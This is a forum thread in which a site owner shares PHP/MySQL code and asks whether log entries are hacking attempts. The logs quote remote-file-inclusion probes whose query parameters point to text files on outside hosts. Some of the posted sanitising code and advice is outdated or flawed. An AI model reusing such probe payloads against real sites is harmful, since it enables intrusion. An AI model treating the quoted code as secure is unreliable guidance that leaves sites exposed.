Hacking problem

dcjones

Hi all.

I have a problem with people/machines hacking my site. The pages concerned display records as follows;

<?php
$currentPage = $_SERVER["PHP_SELF"];

$maxRows_agents = 3;
$pageNum_agents = 0;
if (isset($_GET['pageNum_agents'])) {
  $pageNum_agents = $_GET['pageNum_agents'];
}
$startRow_agents = $pageNum_agents * $maxRows_agents;

mysql_select_db($database_Chandos, $Chandos);
$query_agents = "SELECT * FROM chandos_agents ORDER BY agent_location_id ASC";
$query_limit_agents = sprintf("%s LIMIT %d, %d", $query_agents, $startRow_agents, $maxRows_agents);
$agents = mysql_query($query_limit_agents, $Chandos) or die(mysql_error());
$row_agents = mysql_fetch_assoc($agents);

My hosting company have sent the following:

65.83.194.75 - - [06/Dec/2007:02:21:55 +0100] "GET /chandos_publishing_agents.php?pageNum_agents=http://xoxoxoxox.h17.ru/ht
ml/body.txt? HTTP/1.1" 200 32631 mysite.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "-"

67.168.56.88 - - [06/Dec/2007:09:40:10 +0100] "GET /catalogue/record_detail.php?recordID=http://xoxoxoxox.h17.ru/html/body.
txt? HTTP/1.1" 200 204 mysite.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "-"

Is there a way I can protect:

if (isset($_GET['pageNum_agents'])) {
  $pageNum_agents = $_GET['pageNum_agents'];
}

from any one/machine from adding code.

zabmilenko

I see those alot. From your code it doesn't look like they are successfully hacking. Instead, they are spamming your weblogs.

You can block the IP address, but realize that it is probably some dialup connection in Asia that will have a new IP within a few hours anyway. You could block the ip range, but alot of times a range is allocated to an entire country.

If there is any way to actually stop that sort of spam, I couldn't tell you what it is.

dcjones

Hi and many thanks for your reply.

According to my hosting company whoever it is or what ever it is is appending the URl to the end of my queries.

I am not sure if that is what is happening but if it is that, can I place some code to prevent this.

zabmilenko

You can't prevent them from doing that. You can only make sure that the code you work with is sane.

In your block above you already do this:

if (isset($_GET['pageNum_agents'])) {
  $pageNum_agents = $_GET['pageNum_agents'];
} 
$startRow_agents = $pageNum_agents * $maxRows_agents;

The multiplication forces $pageNum_agents to be an integer. You can force it yourself if you'd like as a precaution:

$pageNum_agents = (int) $_GET['pageNum_agents'];

But it won't prevent people from spamming your query strings. Maybe somebody else knows a trick I don't, in which case I would be happy to learn myself. :-)

dcjones

Hi again,

Many thanks, I have taken your advice and adjusted the code using (int).

bradgrafelman

It appears as though you're vulnerable to SQL injection attacks. User-supplied data should never be placed directly into a SQL query! Instead, sanitize it with a function such as [man]mysql_real_escape_string/man.

Note that casting the user-supplied data to an integer is another way to sanitize data (and preferred, if you are expecting numeric data). Essentially, you first need to ensure that the user-supplied data is of the correct type and then sanitize it (if necessary; numbers can't be used to execute SQL injection).

Also, don't forget to mark this thread resolved.

dcjones

Hi and thanks for your reply.

The code below may not be the best looking code ever written but from a functionality point it works. In you opinion is the code safe against SQL injection.

if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    

    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}




$colname_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname1_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname1_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname2_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname2_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname3_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname3_pin_results =(int) (get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname4_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname4_pin_results = (get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname5_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname5_pin_results =(int) (get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname6_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname6_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname7_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname7_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname8_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname8_pin_results =(int) (get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname9_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname9_pin_results = (int)(get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
$colname10_pin_results = "-1";
if (isset($_POST['pin'])) {
  $colname10_pin_results =(int) (get_magic_quotes_gpc()) ? $_POST['pin'] : addslashes($_POST['pin']);
}
mysql_select_db($database_pin, $pin);
$query_pin_results = sprintf("SELECT * FROM members WHERE member_id  = %s  OR  secure_id_1  = %s OR secure_id_2  = %s OR secure_id_3 = %s  OR secure_id_4 = %s OR secure_id_5 = %s OR secure_id_6 = %s OR secure_id_7 = %s OR secure_id_8= %s  OR secure_id_9 = %s OR secure_id_10 = %s ", GetSQLValueString($colname_pin_results, "int"),GetSQLValueString($colname1_pin_results, "int"),GetSQLValueString($colname2_pin_results, "int"),GetSQLValueString($colname3_pin_results, "int"),GetSQLValueString($colname4_pin_results, "int"),GetSQLValueString($colname5_pin_results, "int"),GetSQLValueString($colname6_pin_results, "int"),GetSQLValueString($colname7_pin_results, "int"),GetSQLValueString($colname8_pin_results, "int"),GetSQLValueString($colname9_pin_results, "int"),GetSQLValueString($colname10_pin_results, "int"));


$pin_results = mysql_query($query_pin_results, $pin) or die(mysql_error());
$row_pin_results = mysql_fetch_assoc($pin_results);
$totalRows_pin_results = mysql_num_rows($pin_results);

zabmilenko

You are doing an addslashes() before a mysql_real_escape_string(), which means you will escape some characters twice. "It's" will become \"It\'s\" etc.

It still doesn't prevent the problem you mentioned in the original post though. :queasy:

dcjones

Hi all.

Many thanks for all the help so far.

Can you advise on the following I have found in my logs:

"GET /chandos_publishing_record_detail.php?ID=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head?"

The code on this page is as follows:

<?php require_once('Connections/Chandos.php'); ?>
<?php
if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;

  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    

    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

$colname_DetailRS1 = "-1";
if (isset($_GET['ID'])) {
  $colname_DetailRS1 = (int)(get_magic_quotes_gpc()) ? $_GET['ID'] : addslashes($_GET['ID']);
}
mysql_select_db($database_Chandos, $Chandos);
$query_DetailRS1 = sprintf("SELECT * FROM chandos_books WHERE ID = %s", GetSQLValueString($colname_DetailRS1, "int"));
$DetailRS1 = mysql_query($query_DetailRS1, $Chandos) or die(mysql_error());
$row_DetailRS1 = mysql_fetch_assoc($DetailRS1);
$totalRows_DetailRS1 = mysql_num_rows($DetailRS1);
?>

Is there anymore I can do to stop the type of log entries I have found, and are they attempts at hacking.